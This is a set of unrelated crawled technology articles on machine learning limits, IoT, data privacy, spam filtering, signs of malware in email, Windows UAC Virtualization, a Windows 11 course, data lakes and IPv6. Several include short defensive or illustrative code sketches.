People need explanations. They want to understand how it works, conceptually at the very least, especially when it comes to topics they deem important. If they're going to trust a machine to make a medical diagnosis, or their car to drive itself, or a program to invest their money, it requires trust that the correct decision is going to be made. The burden of proof is exponentially higher than it is for other people. More than 3,000 people die in car crashes every day and it's deemed normal, but if one self-driving car hits a pedestrian, regardless of who's at fault, there is an outcry that the machines can't be trusted. Skepticism is healthy, but if people don't trust it, companies have a hard time investing in it.

If a doctor uses a program to help make a diagnosis and the diagnosis is wrong, who's at fault? The doctor for trusting the diagnosis? The hospital for buying the software? The programmer of the software for making a bad diagnostic model? The providers of the diagnostic data that led to a faulty diagnostic model? What happens if you apply ML to insurance applications and the algorithm routinely declines policies for a specific sex, minority, or age group? Is the company culpable for violating equality laws, or can it blame the program? "Who's at fault" in the event something goes wrong could have huge financial implications for ML service providers. Although the pros are starting to outweigh the cons, there is hesitation for corporations to invest in the areas where ML could provide the most value.

The reality is that, for the problems you would want to solve with machine learning, the data sets needed to sufficiently train the algorithm often simply don't exist. Either they aren't big enough, they are missing key factors that you expect to be relevant, they are missing key factors that you don't expect to be relevant (think of yet-undiscovered correlations like banana consumption leading to cancer), the data has quality issues such as standardization, or the data is restricted (think of data privacy rules when trying to get diagnosis data). This leads to a need to develop the training data set locally (at one specific hospital) over time, and it can take years to develop something statistically significant.

Sadly, machine learning cannot solve every problem. It suffers from a lack of creativity.
If you want to invent something new, create new art, record new music, etc., machine learning cannot help. It relies on the existence of historical data (read: a lot of historical data), and so expressive tasks aren't really a good fit. As my dad always said, don't use a wrench to bang in a nail.
How the Internet of Things (IoT) is driving the future: 'The Connected Life'

The IoT trend is growing, and it represents a transformative shift for the economy. It opens opportunities for businesses of all sizes and across a variety of sectors to interact with consumers in new and exciting ways and to optimize their strategies. Connected devices take real advantage of cloud computing in terms of quality, reliability, longevity, and resource optimization. It is estimated that by 2020 around 50 billion devices around the globe will be connected to the Internet, feeding petabytes of data to the cloud. With a rising number of devices getting connected and interacting with each other, more data can be captured and analyzed, which in turn increases the potential for unlocking innovations and improving operations. By leveraging cloud technology and big data techniques, manufacturers analyze the data and understand how appliances are used by consumers. Using software tools, the data can then be analyzed and turned into business insight.

IoT is emerging as the third wave in the development of the internet. The Internet wave of the 1990s connected one billion users, while the mobile wave of the 2000s connected another two billion. The IoT has the potential to connect millions of "things" to the internet. IoT relies on more advanced techniques and differs from the Internet in the following ways:
- It leverages sensors attached to things (temperature, pressure, etc.); more data is generated by things with sensors than by people.
- It adds intelligence to manual processes (e.g., reducing power usage on hot days), extending the Internet's productivity gains from people to things.
- It connects objects to the network, and some of the intelligence shifts from the cloud to the network edge.
- It customizes technology and processes to specific verticals (e.g., home automation, healthcare, retail).
- Unlike PCs and smartphones, IoT is fragmented and deploys pervasively (human bodies, cars, homes, cities, etc.).
- With devices connected anywhere, it must provide a high degree of security.

IoT Use Cases/Applications

IoT devices are all around us. The cloud is what connects anything, anytime, anyone. IoT is seeping into everyday life with home and industrial building automation, traffic management automation, remote security and control, and smart applications spanning cities, water, buildings, agriculture, grids, meters, cars, animal farming, and the environment. Below are some of the most common use cases for the IoT (a small sketch of a sensor node for this kind of monitoring follows at the end of this article).
- A refrigerator can identify the food items it holds and prepare your shopping list while you are out.
- Shirts can pick a tie for you.
- Motorized drifters can track and monitor water activities.
- The noise level of a particular area can be monitored.
- Drivers can remotely monitor and control their vehicles.
- Vehicle parking space availability can be automatically monitored.
- Rubbish levels in trash bins can be detected to optimize trash collection routes.

Connecting people and everyday things is not a new phenomenon. Machine-to-Machine communication has been around for many decades; what is new is the way connected things are becoming an integral part of our lives. The Internet of Things (IoT) is receiving an increasing amount of attention, providing significant benefits to human safety, our health, and the environment. There is nothing new about the idea; everybody knew it was "the future." But that future is here.
Effective remote connections, sensors to sense everything, and less expensive processors are building that future now.
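As a purely hypothetical illustration of the monitoring use cases listed above (the device ID, threshold, and message format are invented), the sketch below shows the kind of tiny loop an IoT sensor node might run: take a reading, serialize it for a cloud ingest service, and raise an alert when a threshold is crossed.

```python
import json
import random
import time

DEVICE_ID = "street-sensor-07"   # hypothetical device
NOISE_LIMIT_DB = 85              # arbitrary alert threshold

def read_noise_level() -> float:
    """Stand-in for a real sensor driver; returns a noise level in decibels."""
    return random.uniform(40, 100)

def build_message(value: float) -> str:
    """Serialize one reading; a real node would POST this to its cloud ingest endpoint."""
    return json.dumps({"device": DEVICE_ID, "noise_db": round(value, 1), "ts": time.time()})

if __name__ == "__main__":
    reading = read_noise_level()
    print(build_message(reading))
    if reading > NOISE_LIMIT_DB:
        print(f"Alert: noise level {reading:.1f} dB exceeds the limit")
```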
Security: Is it Mission Impossible?

Importance of Data Privacy

What is the importance of data privacy, and why is it essential? This is something companies need to ask themselves when they are setting things up in their initial phases. Data privacy is one of the preventive measures that are instrumental in protecting data and stopping any corruption throughout the development lifecycle. Many data security solutions are now available on the market, and these solutions generally include a few features that are essential:
- Tokenization – essentially the substitution of sensitive data elements with equivalents known as tokens. The tokens can be referenced freely and are mapped back to the sensitive data (a minimal sketch of this idea appears below).
- Data encryption – a security measure in which data is encoded and can only be decoded when the correct security key is provided.
- Key management – the management of cryptographic keys inside the cryptosystem, including the creation, exchange, storage, and replacement of keys.

Data is something that can make or break a company permanently. It is, therefore, essential to have mechanisms that safeguard it against cyber-attackers. Popular solutions like Cisco Security Solutions now provide additional security levels and functionality to organizations. It is imperative to have these measures in place, and this is where we understand the importance of data security in our personal as well as our corporate lives.

Should we have Data Security Solutions in Place?

We have had quite a series of data security incidents, and the number of incidents and the losses incurred over the years are quite astounding. The following statistics should make you take a hard look at your existing data security measures:
- As per official reports by Verizon, over 94% of malware is delivered via email, and about 34% of data breaches occurred because of internal personnel.
- Symantec notes a considerable volume of phishing emails: the rate was 1 in 2,995 emails in 2017 and has since come down to 1 in 3,207. It has also seen an increase of over 1,000% in malicious PowerShell scripts on security endpoints.
- The 2017 WannaCry outbreak affected over 100,000 groups in over 150 countries and infected close to 400,000 machines, costing companies over $4 billion.
- Cryptomining is another source of attack, involved in over 90% of remote code execution attacks.

Some of these attacks are dangerous, and it is therefore essential to have data security solutions in place for all variants of attack. Companies mainly focus on protecting the three vital spheres of the process, which in turn protect some of the company's inherent assets: intellectual capital, the infrastructure that is important for organizational processes, customer information, brand value, and much more. Therefore, it is important to understand that data security and its solutions are not just important for companies but for our homes as well. We cannot afford data attacks on our home computers that result in cyber-attackers taking away all our data through these unscrupulous measures.
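The following is a minimal, purely illustrative Python sketch of the tokenization idea described above (not drawn from any particular vendor's product): sensitive values are replaced with random tokens, and the mapping is kept in a separate, protected vault.

```python
import secrets

class TokenVault:
    """Toy tokenization: swap sensitive values for random tokens kept in a vault."""

    def __init__(self) -> None:
        self._vault: dict[str, str] = {}   # token -> original value (must be protected)

    def tokenize(self, value: str) -> str:
        token = "tok_" + secrets.token_hex(8)
        self._vault[token] = value
        return token

    def detokenize(self, token: str) -> str:
        return self._vault[token]

if __name__ == "__main__":
    vault = TokenVault()
    token = vault.tokenize("4111-1111-1111-1111")   # example card number
    print("stored in the application database:", token)
    print("recovered by an authorized service:", vault.detokenize(token))
```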
There have also been reports that organizations and businesses get attacked because they have many security backdoors. These allow attackers to sneak in and take away data resources, eventually causing system breakdowns. Data security solutions provide the vital shielding necessary to prevent such backdoor attacks; they put IPsec protocols, email security measures, malware attack deterrents, and other safeguards in place. This should give companies enough assurance that they can prevent these attacks in the future.

About Computer Solutions East

Computer Solutions East is an official partner for Cisco solutions, and it provides expert guidance on the products Cisco offers. CSE understands that much of the technology footprint and landscape is now shifting toward mobile and business applications, which is important for companies in the long run. CSE also provides strong collaboration capabilities around Cisco solutions and support for clients who need it. The efficiency with which its data security services are provided is top-notch, and the security delivered through this approach is much more advanced. Computer Solutions East will tell you that securing your organization's data is important, and nothing is impossible if the approach and the outlook are correct. The company's goal is to let its clients do business in a way that benefits them.
How Spam Filtering Techniques Are Adopting The Latest Technologies Such As Machine Learning

The inception and advancement of technology come with many online threats. Many threats have become obsolete, but spam is one that doesn't seem to be going away any time soon. Spam emails are not always peculiar ads; they can also be emails carrying malicious attachments that target your organization's network. For instance, spam can infect your system with ransomware, with severe consequences as threat actors lock your data and demand a ransom to unlock it. All of this makes implementing proper spam filtering techniques essential today.

What Is A Spam Filter And How Does It Work?

A spam filter is a program developed to spot unwanted, suspicious email messages and prevent such unsolicited messages from reaching a user's inbox. Spam filters look for specific spam indicators that they can evaluate against incoming email and generate a score, based on which an email is considered legitimate or spam. When it comes to the best free spam filters for securing systems, various options are available in the market.

Using Machine Learning for Email Spam Filtering

The machine learning technique uses statistical methods for automatic email classification to filter spam from a user's inbox. Some popular machine learning techniques for spam filtering are Naive Bayes, Support Vector Machines, Decision Trees, Neural Networks, etc. The sophistication of machine learning algorithms makes this one of the best approaches among all spam filtering techniques; a minimal example appears at the end of this article. The success of Gmail's spam filter can be ascribed to Gmail's timely transition to machine learning techniques to filter both incoming spam and other abuses like Denial-of-Service (DoS) attacks. Machine learning based spam filters succeed because they retrain themselves while in use, minimizing the manual effort required while delivering superior filtering accuracy.

Which Are Other Popular Spam Filtering Techniques?

- Honeypots: A honeypot is a decoy system or server set up to gather information about hackers or to collect spam. It offers content-based spam filtering using a fingerprint-based technique and helps security professionals learn about the latest techniques used by hackers.
- Signature schemes: These schemes are used by most antivirus products, which work on the basis of signatures. The MTAs store the hashes of previously identified spam messages and check all incoming mail against these signatures. Since signatures match patterns exactly, these spam filtering solutions can detect known intrusions easily.
- Collaborative spam filtering: A distributed approach to filtering spam. A whole community works with shared information about spam and develops techniques to filter it out.

This article showed how machine learning and other spam filtering techniques are extremely beneficial for staying safe from unsolicited emails. However, a single technique cannot provide 100% protection against spam, so an organization needs a solution with multiple spam-filtering techniques to deal with junk email more effectively. Staff training is also necessary to combat this situation and streamline the spam filtering process.

Join the thousands of organizations that use DuoCircle. Find out how affordable it is for your organization today and be pleasantly surprised.
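Returning to the machine learning approach described above, the sketch below shows the general shape of a Naive Bayes spam classifier. It assumes scikit-learn is installed, and the four training emails are toy examples; a production filter trains on a large, continuously updated corpus.

```python
# Minimal sketch of Naive Bayes spam classification with scikit-learn.
# The tiny training set below is purely illustrative; real filters train on large corpora.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import make_pipeline

train_emails = [
    "Win a free prize, claim your reward now",       # spam
    "Lowest price pills, limited time offer",        # spam
    "Meeting moved to 3pm, agenda attached",         # ham
    "Quarterly report draft for your review",        # ham
]
labels = ["spam", "spam", "ham", "ham"]

model = make_pipeline(CountVectorizer(), MultinomialNB())
model.fit(train_emails, labels)

incoming = ["Claim your free reward today", "Please review the attached agenda"]
print(model.predict(incoming))          # e.g. ['spam' 'ham']
print(model.predict_proba(incoming))    # per-class scores the filter can threshold
```

The per-class probabilities are what a real filter thresholds into a spam score, and retraining the model on newly labelled mail is what lets it adapt over time.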
<urn:uuid:0e3445f5-f74c-425c-8a15-77b7d4410c07>
CC-MAIN-2022-40
https://www.duocircle.com/content/spam-filter/spam-filtering-techniques
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00268.warc.gz
en
0.911475
676
2.71875
3
Cybercrime keeps developing as IT security keeps advancing. By utilizing cutting-edge tools and strategies to breach or corrupt systems, cybercriminals always try to outpace the development of IT security measures. Numerous breaches have occurred, exposing millions of client records, even at well-known companies like Equifax and Adobe.

Particularly for businesses, email is a vital medium for communication. Unfortunately, email is also the primary delivery method for threats and online criminal activity. Can you envision the potential consequences of clicking on a risky link or attachment? The possibility of enormous financial and intellectual losses due to an intrusion or data breach is not overstated. Users must therefore use caution when engaging with these emails. More specifically, users should be able to discern between innocent emails and those that contain malware.

What Is Malware?

Some malware families that first appeared as far back as 2007 look almost old-fashioned in the new service-led ransomware environment. Yet, according to the examination of a sample that DFIR researchers discovered in October, such malware is still quick and effective.

The word "malware" refers to a broad range of harmful software, including viruses, spyware, adware, browser-hijacking programs, and phony security software. Malware may be created to spy on you or steal your personal information, damage your software, or even extort money from users whose machines it infects. Malware may disguise itself as a regular file or hide within one, making it difficult to detect; regrettably, this makes it a common tool for fraud and scams. Although malware variants have diverse ways of infecting systems and propagating, 94% of malware is delivered via email.

Types of Malware

All malware can be exploited to steal data, passwords, personal or financial information, or business secrets. How the variants are propagated or constructed is what usually distinguishes them. We'll look at the six most prevalent kinds of malware to help you better grasp the malware landscape.

Ransomware encrypts and holds your data captive. In most cases, the data is not released until the ransom has been delivered (typically in cryptocurrency). In addition to crippling businesses, ransomware attacks have had catastrophic effects on hospitals, police forces, and even local governments.

Spyware keeps track of everything that happens on a particular machine. For instance, some spyware enables attackers to record keystrokes, which allows them to obtain critical information like passwords.

Trojan horses frequently pose as trustworthy applications, such as MP3 downloads, while secretly harboring dangerous code. The malicious payload of the trojan cannot launch unless the end user opens it. Visiting a compromised website and opening a malicious email are common ways for users to acquire trojans.

Adware frequently gathers information from your computer to show you legitimate-looking or harmful adverts. For instance, a malicious adware application could modify your browser's home page or impede system performance.

A computer virus alters host files, so malicious code runs when the victim launches the infected files. It can be challenging to remove viruses because they affect other files.

Worms became famous in the late 1990s. A worm will frequently appear as a mail attachment that, when opened, may infect an entire business. Worms are known for their ability to reproduce on their own.
7 Tips to Identify Malware in Emails

Users like you can determine whether an email is dangerous, malware-infected, or authentic by keeping an eye out for various indicators and symptoms (a simple scoring sketch based on these indicators follows this list). A few of them are:

1. Strange email address. To put it another way, only open emails from individuals you know, and never open unwanted mail. Unsolicited or unwelcome emails are not to be trusted, just as we do not trust strangers in the real world. They may carry malware or be deceptive.

2. Mischievous attachments. These are most likely what the hacker community focuses on, since they can be used to spread malware. The malware damages your systems when you open or download a malicious attachment. Avoid opening attachments that seem suspicious, since they can contain malware.

3. Thrilling subject lines. Evil intentions hide behind exciting subject lines like "You've Won A Free Trip To Europe" or "Lose 100 Kilos In 3 Days." Such messages may carry malware or aim to steal your data. Treat sensational subject lines as a warning sign and avoid opening these emails in the first place.

4. Danger, urgency, or warning. Malware emails frequently heighten worry or a sense of urgency. Be very cautious if an email asks you to open an attachment to remedy an issue. Some of these messages are followed by a second email that repeats the request.

5. Apprehensive links within emails. The hacker community frequently embeds links in emails that, when clicked, cause you to download malware or drive you to websites that try to steal your private information. Before clicking a link, be sure it is trustworthy.

6. Generic salutation. An email that starts with a generic greeting like "Dear Customer" could contain malware or be a phishing attempt.

7. Absence of logos. Valid email messages, usually written in HTML, may contain both text and graphics. Malware emails typically have a basic layout and very little visual content.

Want to Discover More About Malware and How to Avoid It?

Are there any malware or prevention issues that this article didn't cover? If so, contact us at Data First Solutions via call or email so we can assist and partner with you to fight it.
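As promised above, here is a small, purely illustrative heuristic that scores a message against several of these warning signs. The keyword lists, weights, threshold, and the allow-listed domain are invented for demonstration and are no substitute for a real email security product.

```python
# Illustrative heuristic that scores an email against the warning signs above.
# Keyword lists, weights, and the threshold are invented for demonstration only.
import re

URGENCY_WORDS = {"urgent", "immediately", "act now", "final warning"}
LURE_WORDS = {"free", "won", "prize", "lose 100 kilos"}
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".docm"}
KNOWN_DOMAINS = {"example.com"}          # placeholder allow-list of familiar senders

def score_email(sender: str, subject: str, body: str, attachments: list[str]) -> int:
    score = 0
    text = f"{subject} {body}".lower()
    if any(word in text for word in URGENCY_WORDS):
        score += 2                                    # danger / urgency
    if any(word in text for word in LURE_WORDS):
        score += 2                                    # "thrilling" subject lines
    if any(a.lower().endswith(tuple(RISKY_EXTENSIONS)) for a in attachments):
        score += 3                                    # suspicious attachment types
    if re.search(r"dear (customer|user|member)", text):
        score += 1                                    # generic salutation
    if sender.split("@")[-1] not in KNOWN_DOMAINS:
        score += 1                                    # unfamiliar sender address
    return score

msg_score = score_email(
    sender="offers@unknown-domain.biz",
    subject="URGENT: You won a FREE prize",
    body="Dear customer, act now to claim your reward.",
    attachments=["invoice.exe"],
)
print("suspicious" if msg_score >= 4 else "probably fine", msg_score)
```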
<urn:uuid:96edbd4a-58a6-4752-8fae-539a91ae7ff3>
CC-MAIN-2022-40
https://dfcanada.com/2022/08/30/signs-malware-in-email/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.921811
1,232
2.71875
3
So you know what Virtualization is, and you know what UAC is, but what's UAC Virtualization?

User Account Control (UAC) is more than just a Prompt

Most Windows users will have seen the User Account Control (UAC) execution prompts, which ask the user to confirm that they really want to give a piece of software privileged permissions.

Microsoft introduced UAC in Windows Vista (and Server 2008) to limit system-level changes to privileged administrative accounts only. Generally speaking, software shouldn't need write access to system paths during normal operation, so Windows explicitly restricts applications to run only in the user context, significantly improving security over prior operating systems like Windows XP. Without authorisation from an administrator, a software call to write to a system path would fail and the program couldn't execute. If such access is required (such as installing an update), the UAC prompt requests the user to provide consent before system changes can be made.

This was a great innovation, from both a security and a data management point of view. If software could write to any location with no authorisation required, it could damage files or data, circumvent the operation of other programs, and install or modify anything it liked, all with no oversight and no way for the user to know that their computer was potentially being taken over and controlled by a rogue application. User data was also potentially scattered all over the place in obscure sub-directories within application paths prior to Microsoft forcibly ending such shoddy data management.

UAC breaks Legacy Software, so Microsoft finds a Workaround

The change Microsoft made stopped applications from writing to system files and folders unchecked, which included %ProgramFiles%, %Windir%, %Windir%\System32, and the registry path HKEY_LOCAL_MACHINE\Software. Programs could make changes to the application path (for installation and updates) after user acknowledgement of a UAC prompt, but user settings and data should be stored within the user profile. Programs aren't meant to be calling a UAC prompt every time they run (although there are still some terrible examples of this today). Even global settings should be stored in either a shared editable program space (%ProgramData%) or the appropriate user hive in the Windows registry – nothing user-related should ever be written to the application or Windows folder paths.

However, Microsoft was aware that what they were doing with Vista was new and relatively sudden – rightly or wrongly, application developers had been writing software for years based on some fairly fundamental assumptions, and UAC was going to break some things – things lots of companies depended on to, well, not be broken. As with most major changes, a certain amount of transition was inevitable. While this new way of limiting how software could alter important system files was an excellent idea, Microsoft now had the problem of supporting legacy applications – software that had been written before the time of enlightenment, in the dark ages when software developers would write user data within the application path (something they should have stopped doing after Windows 2000 introduced the Documents and Settings folder, with user data organised and segmented logically within the one root path).
No amount of wishful thinking was going to rewrite the thousands of critical business applications that had been created in the '90s, or undo the poor coding practices that persisted right up until Vista's launch at the end of 2006 (and beyond, in some cases, but let's not dwell on that). If legacy software failed to run in this new, strict, UAC-controlled environment, and that software was important, users would either run everything with administrative privileges (losing any improvement UAC was bringing to the table – indeed, running everything with admin rights would actually have been a worse situation than we'd had with XP) or disable UAC altogether (an equally bad outcome).

Please Welcome to the Stage: UAC Virtualization

So Microsoft came up with UAC Virtualization (or UAC Virtualisation, for those of us who speak real English). Because these applications expected to be able to write to a program file path, UAC Virtualization obfuscates the true path to the target folder for the application and presents it with a writable container within the user path (similar to a Symbolic Link or Junction). As far as the application is concerned it has write access to what it needs, but in reality, instead of writing to C:\Program Files\<Application Path>, it's actually writing to %LOCALAPPDATA%\VirtualStore\<Application Path> (where Windows makes a copy of all program path files the first time the application tries to write to them).

Interestingly, if the program has the ability to open a file browser it can expose to the user, you'll find that as far as it's concerned, the files it's working with are exactly where it expects them to be – in the C:\Program Files\<Application Path> directory tree. But from outside the application, you can see that it's actually manipulating files within the Virtual Store – nothing you do from within the virtualized program will allow you to see the true path.

UAC Virtualization Only Works in Specific Circumstances

There are a few caveats to be aware of in order to make sure UAC Virtualization works:

A. It is limited to 32-bit applications only. AMD64-compatible applications have all been created after these fundamental design decisions were made and by their very nature can't be written to address system files in 'the old way' that UAC Virtualization was created to address. (IA64 applications have their own special set of problems.)
B. The user must have write access to the files in the original file path. Attempting to write to any files with read-only permissions brings the whole house of cards crashing down (i.e. it causes the application to crash with an error code).
C. UAC Virtualization can't be applied to applications running as administrator or otherwise elevated in any way – the application must be running within the standard user context.
D. UAC Virtualization is disabled by default – it has to be explicitly enabled.

Registry Virtualisation is a more specific term for UAC Virtualization applied specifically to registry calls. In that case, registry virtualization fails if an administrator can't write to the key(s) being called (similar to requirement 'B' above).
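To illustrate the redirection just described, the sketch below maps a path that a legacy 32-bit application believes it is writing under Program Files to the per-user VirtualStore location. It only demonstrates the naming convention; whether a redirected copy actually exists depends on a virtualized legacy application having run on that Windows machine.

```python
# Sketch: given a path a legacy 32-bit app *thinks* it writes to under Program Files,
# show where UAC Virtualization would place the per-user copy. Windows-only; purely
# illustrative of the redirection described above.
import os
from pathlib import Path

def virtualstore_path(program_files_path: str) -> Path:
    """Map e.g. C:\\Program Files\\LegacyApp\\settings.ini to the VirtualStore copy."""
    local_appdata = Path(os.environ["LOCALAPPDATA"])
    _drive, tail = os.path.splitdrive(program_files_path)
    return local_appdata / "VirtualStore" / tail.lstrip("\\/")

original = r"C:\Program Files\LegacyApp\settings.ini"   # hypothetical legacy app path
redirected = virtualstore_path(original)
print(redirected)   # ...\AppData\Local\VirtualStore\Program Files\LegacyApp\settings.ini
print("virtualized copy exists:", redirected.exists())
```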
A correct Application Manifest ensures UAC Virtualization isn't Applied

An application's manifest can declare the privilege level the executable needs via the requestedExecutionLevel element, which takes one of three values:

- 'asInvoker' (same access token as the parent process, i.e. the current user context)
- 'highestAvailable' (highest privileges the current user can obtain)
- 'requireAdministrator' (can only run as administrator – this is the flag that calls the UAC prompt we all enjoy so much)

If none of these are present, Windows will virtualise the application automatically (assuming that behaviour has been enabled).

UAC Virtualization silently ensured everything kept working

UAC Virtualization was created to allow legacy applications to continue to function in the new UAC world, by automatically re-routing file access requests from the old (incorrect) program path target to the user data path, completely transparently to both the user and the application. Just like all good IT solutions – elegant, completely unseen, and almost certainly unknown to the possibly hundreds of thousands of people who relied on it every day for some years.

Not a Windows 10 Feature! (and don't rely on it hanging around)

Some people have mistakenly thought UAC Virtualization was a Windows 10 feature, but it isn't. It still exists, in the same way that innumerable legacy features continue to be carried forward and supported for the tiny number of edge cases that still need them. But it was a feature built a decade and a half ago for a problem that in most cases has long since been solved. Microsoft has always stated that it is a temporary, 'interim application compatibility technology' that will eventually be removed – it exists to allow non-compliant legacy applications to operate, but only as a stop-gap measure, and developers have been encouraged for many years to transition their programs to a compliant state (i.e. update or replace them with something that no longer attempts to write to sensitive system areas).

So how do You Make it Work?

Activation of UAC Virtualization is done within Group Policy. Browse to Computer Configuration, Policies, Windows Settings, Security Settings, Local Policies, and Security Options. Scroll right to the bottom of the Security Options policy window. The last policy is called "User Account Control: Virtualize file and registry write failures to per-user locations". Select the 'Define this policy setting' checkbox and change the radio button to 'Enabled'.

Don't try this at Home

You'll never need to do this, of course – if you've never heard of this feature before now, that's because you've never come across a legacy application that needed it, and that's extremely unlikely to change in your future career. But it doesn't hurt to know what it was, and why it was necessary, if for no other reason than to appreciate that words like 'virtualization' can mean rather different things in different contexts. That, and how a single seemingly innocuous change in Group Policy can trigger such an elegant and complicated change to the way Windows treats running applications and can intercept and re-route their file calls on the fly under the hood. Makes you wonder what else you didn't know about those fifty million lines of code… Like App-V, for example.
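As far as I'm aware, the Group Policy setting above is backed by a registry value named EnableVirtualization under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System; treat that value name as an assumption and verify it in your own environment. If you're curious whether the policy has been defined on a given machine, a read-only check might look like this:

```python
# Sketch: read the registry value that (to the best of my knowledge) backs the
# "Virtualize file and registry write failures to per-user locations" policy.
# Windows-only; verify the value name in your environment before relying on it.
import winreg

KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY) as key:
    try:
        value, _type = winreg.QueryValueEx(key, "EnableVirtualization")
        print("UAC Virtualization policy:", "Enabled" if value == 1 else "Disabled")
    except FileNotFoundError:
        print("Value not set; the OS default applies.")
```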
UAC Virtualization was essentially a workaround to allow legacy programs that expected to store and change user data within the program's application folder path to continue to work under the new, more secure and better-organised data structures introduced in Windows Vista alongside the User Account Control security features. This applied to both file and registry targets and was achieved by dynamically redirecting file access calls from application paths to user data paths in a way that was completely transparent to the software. The term 'virtualization' here refers to the folders and data only appearing in the expected location 'virtually', when the data is actually in a completely different location.

Have you had any hands-on experience with UAC Virtualization? Let us know in the comments section below.
<urn:uuid:146ad5d2-cb8d-4d0a-ae0c-c0173778104c>
CC-MAIN-2022-40
https://www.altaro.com/hyper-v/what-is-uac-virtualization/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.937873
2,216
3.171875
3
As an experienced Windows 10 user, when you are ready to move to Windows 11, you might like some guidance in using the new and updated features. This course will help you identify and use those features efficiently and effectively.

Who should attend

This course is designed for students who have experience using the Windows 10 operating system and need to start using the Windows 11 operating system. To ensure your success in this course, you should have experience with using Windows 10.

After completing this course, students will be able to:
- Navigate the Windows environment.
- Use apps available in Windows 11.
- Manage available apps.
- Configure Windows 11 settings.

Outline: Microsoft Windows 11: Transition from Windows 10 (91171)

Module 1: Navigating the Windows 11 Environment
- Log in to Windows 11
- Use the Start Menu
- Use the Taskbar

Module 2: Using Apps
- Use Built-In Apps
- Use the Updated File Explorer

Module 3: Managing Apps
- Use Virtual Desktops
- Obtain Apps from the Microsoft Store

Module 4: Configuring Windows 11 Settings
- Use the Configuration Apps
- Configure Accessibility Features
<urn:uuid:c3b507bb-c70c-45ee-8237-84275400b4e5>
CC-MAIN-2022-40
https://www.fastlanetraining.ca/course/microsoft-91171
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00268.warc.gz
en
0.749392
267
2.671875
3
TechTarget has recently published a definition of the term data lake. The explanation mentions that the term data lake is becoming accepted as a way to describe any large data pool in which the schema and data requirements are not defined until the data is queried. The explanation also states that: "While a hierarchical data warehouse stores data in files or folders, a data lake uses a flat architecture to store data."

A data lake is an approach to overcoming the well-known big data characteristics of volume, velocity and variety, where the last of these, variety, is probably the most difficult to handle with a traditional data warehouse approach. Traditional ways of using data warehouses have revolved around storing internal transaction data linked to internal master data. With the rise of big data there will be a shift towards encompassing more and more external data. One kind of external data is reference data: data that is typically born outside a given organization and serves many different purposes. Sharing data with the outside world must be a part of your big data approach. This goes for the traditional flavours of big data, such as social data and sensor data, as well as what we may call big reference data, being pools of global data and bilateral data as explained on this blog on the page called Data Quality 3.0. The data lake approach may very well work for big reference data just as it does for other flavours of big data.

The BrightTalk community on Big Data and Data Management has a formidable collection of webinars and videos on big data and data management topics. I am looking forward to contributing there on 25th June 2015 with a webinar about Big Reference Data.
<urn:uuid:225e3778-97d0-4c37-93dd-a68ae3b0fd6b>
CC-MAIN-2022-40
https://liliendahl.com/2015/06/19/using-a-data-lake-for-reference-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00268.warc.gz
en
0.945364
341
2.84375
3
Internet Protocol version 6 (IPv6) is the most recent version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for machines on networks and routes traffic across the Internet. IPv6 was developed by the Internet Engineering Task Force (IETF) to deal with the long-anticipated problem of IPv4 address exhaustion. IPv6 is intended to replace IPv4, which still carried more than 96% of Internet traffic worldwide as of May 2014. As of June 2014, the share of clients reaching Google services over IPv6 exceeded 4% for the first time.

Each device on the Internet is assigned an IP address for identification and location definition. With the rapid growth of the Internet after commercialization in the 1990s, it became obvious that significantly more addresses than the IPv4 address space offers would be needed to connect new devices in the future. By 1998, the Internet Engineering Task Force (IETF) had formalized the successor protocol. IPv6 uses a 128-bit address, permitting 2^128, or approximately 3.4×10^38 addresses – more than 7.9×10^28 times as many as IPv4, which uses 32-bit addresses and provides approximately 4.3 billion addresses. The two protocols are not designed to be interoperable, complicating the transition to IPv6. However, several IPv6 transition mechanisms have been devised to allow communication between IPv4 and IPv6 hosts.

IPv6 provides other technical benefits in addition to a larger addressing space. In particular, it permits hierarchical address allocation methods that facilitate route aggregation across the Internet and thereby limit the expansion of routing tables. The use of multicast is extended and simplified, providing additional optimization for the delivery of services. Device mobility, security, and configuration aspects were considered in the design of the protocol.

IPv6 addresses are represented as eight groups of four hexadecimal digits separated by colons, for instance 2001:0db8:85a3:0042:1000:8a2e:0370:7334, although methods for abbreviating this full notation exist. IPv6 is an Internet Layer protocol for packet-switched internetworking and provides end-to-end datagram transmission across multiple IP networks, closely adhering to the design principles developed in the previous version of the protocol, Internet Protocol version 4 (IPv4). IPv6 was first formally described in Internet standard document RFC 2460, published in December 1998.

In addition to offering more addresses, IPv6 also implements features not present in IPv4. It simplifies aspects of address assignment (stateless address autoconfiguration), network renumbering, and router announcements when changing network connectivity providers. It simplifies the processing of packets by routers by placing the responsibility for packet fragmentation at the end points. The IPv6 subnet size is standardized by fixing the size of the host identifier portion of an address at 64 bits, to facilitate an automatic mechanism for forming the host identifier from link-layer addressing information (the MAC address). Network security was a design requirement of the IPv6 architecture, and the work included the original specification of IPsec.

IPv6 does not specify interoperability features with IPv4, but essentially creates a parallel, independent network. Exchanging traffic between the two networks requires translator gateways using one of several transition mechanisms, such as NAT64 or the tunneling protocols 6to4, 6in4, and Teredo.
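The abbreviation rules mentioned above are easy to see with Python's standard-library ipaddress module, using the example address from the text:

```python
# Sketch: IPv6 address notation with the standard-library ipaddress module,
# using the example address from the text above.
import ipaddress

addr = ipaddress.ip_address("2001:0db8:85a3:0042:1000:8a2e:0370:7334")
print(addr.compressed)   # 2001:db8:85a3:42:1000:8a2e:370:7334 (leading zeros dropped)
print(addr.exploded)     # 2001:0db8:85a3:0042:1000:8a2e:0370:7334 (full eight groups)

# Abbreviation also collapses one run of all-zero groups to "::"
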